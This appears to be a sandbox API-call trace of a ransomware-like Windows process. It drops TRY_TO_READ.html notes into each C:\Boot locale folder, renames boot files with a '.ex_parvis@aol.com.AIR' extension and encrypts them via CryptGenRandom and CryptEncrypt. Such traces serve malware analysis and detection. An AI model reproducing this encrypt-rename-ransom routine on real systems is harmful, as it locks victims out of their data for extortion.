	[0051.893] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.893] CloseHandle (hObject=0x3c4) returned 1
	[0051.893] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.893] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.893] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.893] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a57b0 | out: hHeap=0x540000) returned 1
	[0051.893] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1
	[0051.893] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.893] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.893] GetLastError () returned 0x0
	[0051.893] SetLastError (dwErrCode=0x0) 
	[0051.893] GetLastError () returned 0x0
	[0051.893] SetLastError (dwErrCode=0x0) 
	[0051.893] GetLastError () returned 0x0
	[0051.893] SetLastError (dwErrCode=0x0) 
	[0051.893] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a57b0
	[0051.894] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a57d8
	[0051.894] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5800
	[0051.894] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.894] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.894] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.894] GetLastError () returned 0x0
	[0051.894] SetLastError (dwErrCode=0x0) 
	[0051.894] GetLastError () returned 0x0
	[0051.894] SetLastError (dwErrCode=0x0) 
	[0051.894] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.894] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\TRY_TO_READ.html" (normalized: "c:\\boot\\sv-se\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.894] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.894] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.895] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.895] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.895] CloseHandle (hObject=0x3c4) returned 1
	[0051.895] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.895] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.895] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.895] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5800 | out: hHeap=0x540000) returned 1
	[0051.896] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1
	[0051.896] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.896] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.896] GetLastError () returned 0x0
	[0051.896] SetLastError (dwErrCode=0x0) 
	[0051.896] GetLastError () returned 0x0
	[0051.896] SetLastError (dwErrCode=0x0) 
	[0051.896] GetLastError () returned 0x0
	[0051.896] SetLastError (dwErrCode=0x0) 
	[0051.896] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5800
	[0051.896] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5828
	[0051.896] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5850
	[0051.896] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.896] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.896] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.896] GetLastError () returned 0x0
	[0051.896] SetLastError (dwErrCode=0x0) 
	[0051.896] GetLastError () returned 0x0
	[0051.896] SetLastError (dwErrCode=0x0) 
	[0051.896] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.896] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\TRY_TO_READ.html" (normalized: "c:\\boot\\tr-tr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.897] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.897] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.898] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.898] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.898] CloseHandle (hObject=0x3c4) returned 1
	[0051.898] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.898] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.898] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.898] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5850 | out: hHeap=0x540000) returned 1
	[0051.898] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bcbdb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.899] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.899] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.899] GetLastError () returned 0x0
	[0051.899] SetLastError (dwErrCode=0x0) 
	[0051.899] GetLastError () returned 0x0
	[0051.899] SetLastError (dwErrCode=0x0) 
	[0051.899] GetLastError () returned 0x0
	[0051.899] SetLastError (dwErrCode=0x0) 
	[0051.899] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.899] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.899] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.899] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.899] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.899] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.899] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1
	[0051.899] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.899] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.899] GetLastError () returned 0x0
	[0051.899] SetLastError (dwErrCode=0x0) 
	[0051.899] GetLastError () returned 0x0
	[0051.899] SetLastError (dwErrCode=0x0) 
	[0051.899] GetLastError () returned 0x0
	[0051.899] SetLastError (dwErrCode=0x0) 
	[0051.899] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5850
	[0051.899] GetLastError () returned 0x0
	[0051.900] SetLastError (dwErrCode=0x0) 
	[0051.900] GetLastError () returned 0x0
	[0051.900] SetLastError (dwErrCode=0x0) 
	[0051.900] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\TRY_TO_READ.html" (normalized: "c:\\boot\\zh-cn\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.900] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.900] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.901] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.901] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.901] CloseHandle (hObject=0x3c4) returned 1
	[0051.901] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.901] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.901] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.901] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58a0 | out: hHeap=0x540000) returned 1
	[0051.901] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1
	[0051.901] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.901] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.901] GetLastError () returned 0x0
	[0051.902] SetLastError (dwErrCode=0x0) 
	[0051.902] GetLastError () returned 0x0
	[0051.902] SetLastError (dwErrCode=0x0) 
	[0051.902] GetLastError () returned 0x0
	[0051.902] SetLastError (dwErrCode=0x0) 
	[0051.902] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58a0
	[0051.902] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58c8
	[0051.902] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58f0
	[0051.902] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.902] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.902] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.902] GetLastError () returned 0x0
	[0051.902] SetLastError (dwErrCode=0x0) 
	[0051.902] GetLastError () returned 0x0
	[0051.902] SetLastError (dwErrCode=0x0) 
	[0051.902] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.902] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\TRY_TO_READ.html" (normalized: "c:\\boot\\zh-hk\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.903] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.903] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.904] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.904] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.904] CloseHandle (hObject=0x3c4) returned 1
	[0051.904] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.904] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.905] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.905] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58f0 | out: hHeap=0x540000) returned 1
	[0051.905] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1
	[0051.905] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.905] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.905] GetLastError () returned 0x0
	[0051.905] SetLastError (dwErrCode=0x0) 
	[0051.905] GetLastError () returned 0x0
	[0051.905] SetLastError (dwErrCode=0x0) 
	[0051.905] GetLastError () returned 0x0
	[0051.905] SetLastError (dwErrCode=0x0) 
	[0051.905] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58f0
	[0051.905] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5918
	[0051.905] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5940
	[0051.905] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.905] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.905] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.905] GetLastError () returned 0x0
	[0051.905] SetLastError (dwErrCode=0x0) 
	[0051.905] GetLastError () returned 0x0
	[0051.905] SetLastError (dwErrCode=0x0) 
	[0051.905] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.905] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\TRY_TO_READ.html" (normalized: "c:\\boot\\zh-tw\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.906] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.906] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.907] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.907] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.907] CloseHandle (hObject=0x3c4) returned 1
	[0051.907] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.907] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.907] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.907] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5940 | out: hHeap=0x540000) returned 1
	[0051.907] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0
	[0051.907] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.907] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a7ca8
	[0051.907] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.907] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a7ca8 | out: pbBuffer=0x5a7ca8) returned 1
	[0051.907] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596560 | out: pbBuffer=0x596560) returned 1
	[0051.907] SetFileAttributesW (lpFileName="C:\\\\Boot\\memtest.exe", dwFileAttributes=0x80) returned 0
	[0051.908] lstrlenW (lpString="C:\\\\Boot\\memtest.exe") returned 20
	[0051.908] GetProcessHeap () returned 0x540000
	[0051.908] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8e) returned 0x5832a8
	[0051.908] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\memtest.exe" | out: lpString1="C:\\\\Boot\\memtest.exe") returned="C:\\\\Boot\\memtest.exe"
	[0051.908] lstrcatW (in: lpString1="C:\\\\Boot\\memtest.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.908] MoveFileExW (lpExistingFileName="C:\\\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), lpNewFileName="C:\\\\Boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.908] CreateFileW (lpFileName="C:\\\\Boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.908] GetProcessHeap () returned 0x540000
	[0051.908] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.908] CloseHandle (hObject=0xffffffff) returned 0
	[0051.908] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.908] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583aa0 | out: hHeap=0x540000) returned 1
	[0051.908] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583aa0
	[0051.908] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a7db0
	[0051.908] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.908] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a7db0 | out: pbBuffer=0x5a7db0) returned 1
	[0051.908] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596570 | out: pbBuffer=0x596570) returned 1
	[0051.908] SetFileAttributesW (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT", dwFileAttributes=0x80) returned 1
	[0051.909] lstrlenW (lpString="C:\\\\Boot\\BOOTSTAT.DAT") returned 21
	[0051.909] GetProcessHeap () returned 0x540000
	[0051.909] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5832a8
	[0051.909] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\BOOTSTAT.DAT" | out: lpString1="C:\\\\Boot\\BOOTSTAT.DAT") returned="C:\\\\Boot\\BOOTSTAT.DAT"
	[0051.909] lstrcatW (in: lpString1="C:\\\\Boot\\BOOTSTAT.DAT", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.909] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bootstat.dat.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0051.914] CreateFileW (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bootstat.dat.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.914] GetProcessHeap () returned 0x540000
	[0051.914] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.914] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=65536) returned 1
	[0051.914] SetFilePointer (in: hFile=0x3c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10000
	[0051.914] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0051.914] GetProcessHeap () returned 0x540000
	[0051.914] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5a7eb8
	[0051.914] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5a7eb8*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5a7eb8*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0051.915] WriteFile (in: hFile=0x3c4, lpBuffer=0x5a7eb8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5a7eb8*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
